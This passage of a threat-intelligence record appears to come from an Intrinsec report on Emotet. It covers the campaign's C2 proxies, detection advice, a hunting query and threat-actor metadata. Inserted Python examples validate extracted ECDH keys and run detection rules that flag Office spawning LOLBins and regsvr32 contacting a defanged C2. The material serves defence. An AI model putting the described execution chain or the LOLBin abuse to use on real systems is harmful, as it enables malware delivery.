services listening on those ports and communicating with the payloads, we systematically found an\r\nnginx proxy server. This was deduced from the response headers returned to a simple HTTP GET request.\r\nWhile trying to find a differentiating element on these servers, we noticed a common trait: most of them exposed\r\nlegitimate web services next to the service used for command and control, on a different port. 
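The two ECDH and ECDSA blobs listed in the code-analysis section above are DER-encoded SubjectPublicKeyInfo structures, and their common prefix is the fixed header of an uncompressed NIST P-256 point. Since samples are tagged as Epoch 4 or Epoch 5 by their keys, a practitioner wants a check that an extracted key is well formed and a stable identifier for it. The following Python is an added example, not code from the report or from Intrinsec. It parses such a key with the standard library only, verifies that the point actually lies on P-256 (a malformed or tampered key would otherwise be accepted silently), and returns a SHA-256 fingerprint of the DER to tag the sample with. Because the two keys as printed in the report are truncated, the demo builds its own complete key from an invented private scalar; that scalar and the toy affine curve arithmetic are assumptions of the example, and the truncation check is exercised on the report’s ECDH string.

```python
import base64
import hashlib

# DER header of a SubjectPublicKeyInfo carrying an uncompressed NIST P-256 point:
# SEQUENCE { SEQUENCE { OID ecPublicKey, OID prime256v1 }, BIT STRING 0x04 X Y }.
# Base64-encoded, these 27 bytes are exactly the prefix shared by both keys in the
# report, MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE.
P256_SPKI_HEADER = bytes.fromhex('3059301306072a8648ce3d020106082a8648ce3d03010703420004')

# NIST P-256 domain parameters (public constants, FIPS 186-4)
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)

# ECDH key from the report, reproduced as printed there (it is cut short)
REPORT_ECDH = 'MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuwTyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TII'

def on_curve(x, y):
    return 0 <= x < P and 0 <= y < P and (y * y - (x * x * x + A * x + B)) % P == 0

def ec_add(p1, p2):
    # Affine addition on P-256; None stands for the point at infinity.
    if p1 is None: return p2
    if p2 is None: return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0: return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)

def ec_mul(k, point):
    # Double-and-add scalar multiplication (demo only, not constant-time)
    acc = None
    while k:
        if k & 1: acc = ec_add(acc, point)
        point = ec_add(point, point)
        k >>= 1
    return acc

def parse_p256_spki(b64: str) -> dict:
    # Validate a base64 SPKI pulled out of an unpacked sample and return the point
    # plus a SHA-256 fingerprint of the DER, usable as a stable label for the key.
    if len(b64) % 4:
        raise ValueError(f'base64 length {len(b64)} is not a multiple of 4: key is truncated or mangled')
    der = base64.b64decode(b64, validate=True)
    if len(der) != 91 or not der.startswith(P256_SPKI_HEADER):
        raise ValueError('not an uncompressed P-256 SubjectPublicKeyInfo')
    x = int.from_bytes(der[27:59], 'big')
    y = int.from_bytes(der[59:91], 'big')
    if not on_curve(x, y):
        raise ValueError('point is not on P-256: corrupted or hostile key')
    return {'curve': 'prime256v1', 'x': x, 'y': y,
            'fingerprint': hashlib.sha256(der).hexdigest()}

def check_key(b64: str) -> str:
    # Convenience wrapper: 'ok' or the reason the key was rejected
    try:
        parse_p256_spki(b64)
        return 'ok'
    except ValueError as e:
        return f'rejected: {e}'

DEMO_SCALAR = 0x1f3a9c5e7b2d4806a1c3e5f709b2d4e6f8a0c2e4061829304a5b6c7d8e9f0a1  # invented
def demo_key_b64() -> str:
    # Build a complete, valid key for the demo since the report's are truncated
    x, y = ec_mul(DEMO_SCALAR, G)
    der = P256_SPKI_HEADER + x.to_bytes(32, 'big') + y.to_bytes(32, 'big')
    return base64.b64encode(der).decode()

if __name__ == '__main__':
    print(check_key(REPORT_ECDH))
    k = parse_p256_spki(demo_key_b64())
    print(k['curve'], k['fingerprint'])
```

The modular inverse via pow(x, -1, P) needs Python 3.8 or later. In a pipeline, the fingerprint of the ECDH key is what to store per sample: two samples sharing it belong to the same epoch, and a key whose point fails the curve check should be treated as an extraction error rather than a new botnet.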
The commonalities observed on these C2 proxy servers are\r\nsummarized in two Maltego graphs, depicted in Figure 24 and Figure 25.\r\nFigure 24 Maltego graph of Emotet’s Epoch 4 C2 proxies, with the legitimate services they expose and the vulnerabilities affecting them.\r\nFigure 25 Maltego graph of Emotet’s Epoch 5 C2 proxies, with the legitimate services they expose and the vulnerabilities affecting them.\r\nIn addition to exposing legitimate web services, all these servers have numerous vulnerabilities according to Shodan. We\r\nconcluded, with a moderate level of confidence, that these servers are poorly secured and may have been compromised.\r\nConclusion\r\nThe present report provides a straightforward and up-to-date analysis of the ongoing Emotet campaign, presently\r\ndistributing hundreds of thousands of emails per day. This investigation highlights notable changes in the modus operandi of\r\nEmotet’s operators (TA542), such as new ways of social engineering victims into executing the malicious documents used to deploy\r\nEmotet. Beyond these new initial-access methods, the present report shows that the change in the\r\nobfuscation technique of the main payload does not prevent easy extraction of the malware’s configuration, which\r\nsuggests that Emotet’s developers may not understand how modern decompilers actually work. We also showed that since its\r\nreturn, Emotet has been seen dropping IcedID and Bumblebee via Epoch 4 botnets. We anticipate that further\r\nvariants and techniques will surface in the future, with smaller or greater volumes of spam.\r\nThe present report also provides several tips to analyze the whole attack chain leveraged by Emotet, as well as some\r\nrecommendations to defend against it.\r\nActionable content\r\nAs we have seen in the main text, Emotet spreaders were forced to adapt and now try to lure users into\r\ncopying the maldoc into a whitelisted directory path on the disk, where Office does not block its macros. 
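The monitoring recommended for that lure (spreadsheets executed from the whitelisted directory) combines naturally with the regsvr32 and Office-spawns-LOLBin logic of the SIGMA rules referenced later in this section. The Python below is an added example, not code from the report, from Intrinsec or from the SIGMA project: it runs three such rules over a handful of constructed Sysmon-style events (process creation, network connection and DNS query records; the destination IP and port are the C2 returned by the emulation in the code-analysis section, everything else is invented). The list of trusted Office locations is an assumption to be replaced by the directories actually whitelisted in the environment, and paths are normalised to forward slashes before matching so the rules do not depend on the logging agent’s path style.

```python
import re

BS = chr(92)  # backslash; sample Windows paths are assembled with it
def w(p: str) -> str:
    return p.replace('/', BS)

OFFICE_APPS = ('excel.exe', 'winword.exe', 'powerpnt.exe')
LOLBINS = ('regsvr32.exe', 'rundll32.exe', 'mshta.exe', 'wscript.exe', 'cscript.exe',
           'cmd.exe', 'powershell.exe', 'certutil.exe', 'msiexec.exe')
# Assumed trusted locations (Office runs macros there without a prompt); replace with
# the directories actually whitelisted in your environment.
TRUSTED_DIRS = ('/program files/microsoft office/templates/',
                '/program files (x86)/microsoft office/templates/')

def norm(p: str) -> str:
    return p.replace(BS, '/').lower()

def basename(p: str) -> str:
    return norm(p).rsplit('/', 1)[-1]

def rule_xls_from_trusted_dir(ev: dict) -> bool:
    # Excel started on a spreadsheet that lives in a whitelisted directory
    if ev['id'] != 1 or basename(ev['image']) != 'excel.exe':
        return False
    cl = norm(ev.get('cmdline', ''))
    return any(d in cl for d in TRUSTED_DIRS) and bool(re.search('[.]xls[mb]?( |$)', cl))

def rule_office_spawns_lolbin(ev: dict) -> bool:
    # Office application creating a living-off-the-land binary
    return (ev['id'] == 1 and basename(ev['parent']) in OFFICE_APPS
            and basename(ev['image']) in LOLBINS)

def rule_regsvr32_network(ev: dict) -> bool:
    # regsvr32.exe has no business talking to the network or resolving names
    return ev['id'] in (3, 22) and basename(ev['image']) == 'regsvr32.exe'

RULES = (('Excel document executed from trusted Office location', rule_xls_from_trusted_dir),
         ('LOLBin spawned by Office application', rule_office_spawns_lolbin),
         ('Network connection or DNS query by regsvr32.exe', rule_regsvr32_network))

def run_rules(events) -> list:
    # Returns (event index, rule name) for every match
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]

# Constructed Sysmon-style events (1 = process create, 3 = network connect, 22 = DNS query).
# Destination IP/port are the C2 from the emulation result (defanged); the rest is invented.
SAMPLE_EVENTS = [
    {'id': 1, 'image': w('C:/Program Files/Microsoft Office/root/Office16/EXCEL.EXE'),
     'parent': w('C:/Windows/explorer.exe'),
     'cmdline': 'EXCEL.EXE ' + w('C:/Program Files/Microsoft Office/Templates/invoice_2211.xls')},
    {'id': 1, 'image': w('C:/Windows/System32/regsvr32.exe'),
     'parent': w('C:/Program Files/Microsoft Office/root/Office16/EXCEL.EXE'),
     'cmdline': 'regsvr32.exe /s ' + w('C:/Users/bob/AppData/Local/Temp/mwqa.dll')},
    {'id': 3, 'image': w('C:/Windows/System32/regsvr32.exe'), 'dst': '159.65.88[.]10', 'port': 8080},
    {'id': 1, 'image': w('C:/Program Files/Microsoft Office/root/Office16/WINWORD.EXE'),
     'parent': w('C:/Windows/explorer.exe'),
     'cmdline': 'WINWORD.EXE ' + w('C:/Users/bob/Documents/notes.docx')},
    {'id': 3, 'image': w('C:/Program Files/Google/Chrome/Application/chrome.exe'), 'dst': '203.0.113.7', 'port': 443},
    {'id': 22, 'image': w('C:/Windows/System32/regsvr32.exe'), 'query': 'updates.example.net'},
]

if __name__ == '__main__':
    for idx, name in run_rules(SAMPLE_EVENTS):
        print(f'event {idx}: {name}')
```

The first rule is the one that targets the new lure directly and is also the noisiest if the organisation genuinely stores templates in that directory, so tune TRUSTED_DIRS and baseline it before alerting; the other two fire on the Emotet execution chain itself (the XLS dropping a DLL that regsvr32 loads and that then reaches out to the C2) and carry far fewer false positives.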
We recommend monitoring any execution of XLS files launched\r\nfrom those whitelisted directories. It is also recommended to make employees aware of this new technique through awareness training\r\nsessions and simulated phishing attacks.\r\nEmotet is known to be highly polymorphic (i.e., its code changes its identifiable features while maintaining its\r\nfunctionality) and tends to embed more and more threatening modules. Emotet often repacks its dropper and changes the\r\nmodules it loads to stay ahead of signature-based detection solutions. Although its functionality might not vary that much,\r\nthese changes are enough to bypass pattern-matching and footprint-based detection. More subtle detection (EDR, behavioral\r\nanalysis) is required to catch the initial infection.\r\nWe draw your attention to one checker and complementary tools:\r\nA relevant free tool to defend against Emotet, dubbed EmoCheck, was released a while ago by JPCERT/CC\r\n(available on their GitHub repository). This checker is particularly relevant for forensics teams when they\r\ninvestigate workstations or servers that might have been infected by Emotet. EmoCheck-ReportChecker can also be\r\nhelpful, as it generates statistics from numerous EmoCheck reports.\r\nAnother relevant tool is EmoKill. 
This program was inspired by EmoCheck’s detection rules and was\r\ncompiled and shared on GitHub.\r\nTo draft this report, Intrinsec studied commonalities among the XLS maldocs sent to Emotet’s victims as spearphishing attachments.\r\nOne common piece of metadata that can be leveraged on VirusTotal Intelligence for hunting purposes is the following:\r\nmagic:”CDF V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, *Author: Gydar, Last\r\nSaved By: Gydar*, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jun 04 18:19:34\r\n2015, Security: 0″\r\nCode page 1251 is the Windows Cyrillic encoding, mostly used for Russian, Bulgarian, Serbian\r\nand Macedonian. It is also worth noting that all results of the aforementioned query on VT have the same file size of 255 kB.\r\nSeveral SIGMA detection rules can be leveraged to detect an Emotet attack:\r\nDetects network connections and DNS queries initiated by Regsvr32.exe\r\nDetects various anomalies in relation to regsvr32.exe\r\nDetects New Lolbin Process by Office Applications\r\nA YARA detection rule provided by The DFIR Report\r\nTo detect all threats mentioned in this report (Emotet, IcedID, Bumblebee), defenders can also rely on the abuse.ch threat\r\nintelligence sources Feodo Tracker, ThreatFox and MalwareBazaar, as well as Intrinsec’s upcoming IoC feed.\r\nIndicators of compromise\r\nIoCs are available at https://github.com/Intrinsec/IOCs/tree/main/Emotet\r\nSource: 
https://www.intrinsec.com/emotet-returns-and-deploys-loaders/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.intrinsec.com/emotet-returns-and-deploys-loaders/"
	],
	"report_names": [
		"emotet-returns-and-deploys-loaders"
	],
	"threat_actors": [
		{
			"id": "e8e18067-f64b-4e54-9493-6d450b7d40df",
			"created_at": "2022-10-25T16:07:24.515213Z",
			"updated_at": "2026-04-10T02:00:05.018868Z",
			"deleted_at": null,
			"main_name": "Mummy Spider",
			"aliases": [
				"ATK 104",
				"Gold Crestwood",
				"Mummy Spider",
				"TA542"
			],
			"source_name": "ETDA:Mummy Spider",
			"tools": [
				"Emotet",
				"Geodo",
				"Heodo"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "506404b2-82fb-4b7e-b40d-57c2e9b59f40",
			"created_at": "2023-01-06T13:46:38.870883Z",
			"updated_at": "2026-04-10T02:00:03.128317Z",
			"deleted_at": null,
			"main_name": "MUMMY SPIDER",
			"aliases": [
				"TA542",
				"GOLD CRESTWOOD"
			],
			"source_name": "MISPGALAXY:MUMMY SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f6f91e1c-9202-4497-bf22-9cd5ef477600",
			"created_at": "2023-01-06T13:46:38.86765Z",
			"updated_at": "2026-04-10T02:00:03.12735Z",
			"deleted_at": null,
			"main_name": "WIZARD SPIDER",
			"aliases": [
				"TEMP.MixMaster",
				"GOLD BLACKBURN",
				"DEV-0193",
				"UNC2053",
				"Pistachio Tempest",
				"DEV-0237",
				"Storm-0230",
				"FIN12",
				"Periwinkle Tempest",
				"Storm-0193",
				"Trickbot LLC"
			],
			"source_name": "MISPGALAXY:WIZARD SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "63061658-5810-4f01-9620-7eada7e9ae2e",
			"created_at": "2022-10-25T15:50:23.752974Z",
			"updated_at": "2026-04-10T02:00:05.244531Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"Wizard Spider",
				"UNC1878",
				"TEMP.MixMaster",
				"Grim Spider",
				"FIN12",
				"GOLD BLACKBURN",
				"ITG23",
				"Periwinkle Tempest",
				"DEV-0193"
			],
			"source_name": "MITRE:Wizard Spider",
			"tools": [
				"TrickBot",
				"AdFind",
				"BITSAdmin",
				"Bazar",
				"LaZagne",
				"Nltest",
				"GrimAgent",
				"Dyre",
				"Ryuk",
				"Conti",
				"Emotet",
				"Rubeus",
				"Mimikatz",
				"Diavol",
				"PsExec",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ac83159-1d9d-4db4-a176-97be6b7b07c9",
			"created_at": "2024-06-19T02:03:08.024653Z",
			"updated_at": "2026-04-10T02:00:03.672512Z",
			"deleted_at": null,
			"main_name": "GOLD CRESTWOOD",
			"aliases": [
				"Mummy Spider ",
				"TA542 "
			],
			"source_name": "Secureworks:GOLD CRESTWOOD",
			"tools": [
				"Emotet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3",
			"created_at": "2022-10-25T16:07:24.422115Z",
			"updated_at": "2026-04-10T02:00:04.983298Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"DEV-0193",
				"G0102",
				"Gold Blackburn",
				"Gold Ulrick",
				"Grim Spider",
				"ITG23",
				"Operation BazaFlix",
				"Periwinkle Tempest",
				"Storm-0230",
				"TEMP.MixMaster",
				"Wizard Spider"
			],
			"source_name": "ETDA:Wizard Spider",
			"tools": [
				"AdFind",
				"Agentemis",
				"Anchor_DNS",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"Conti",
				"Diavol",
				"Dyranges",
				"Dyre",
				"Dyreza",
				"Dyzap",
				"Gophe",
				"Invoke-SMBAutoBrute",
				"KEGTAP",
				"LaZagne",
				"LightBot",
				"PowerSploit",
				"PowerTrick",
				"PsExec",
				"Ryuk",
				"SessionGopher",
				"TSPY_TRICKLOAD",
				"Team9Backdoor",
				"The Trick",
				"TheTrick",
				"Totbrick",
				"TrickBot",
				"TrickLoader",
				"TrickMo",
				"Upatre",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434477,
	"ts_updated_at": 1775826768,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4e8c55fd789a464429527d10f07ce9ba0b291aa9.pdf",
		"text": "https://archive.orkl.eu/4e8c55fd789a464429527d10f07ce9ba0b291aa9.txt",
		"img": "https://archive.orkl.eu/4e8c55fd789a464429527d10f07ce9ba0b291aa9.jpg"
	}
}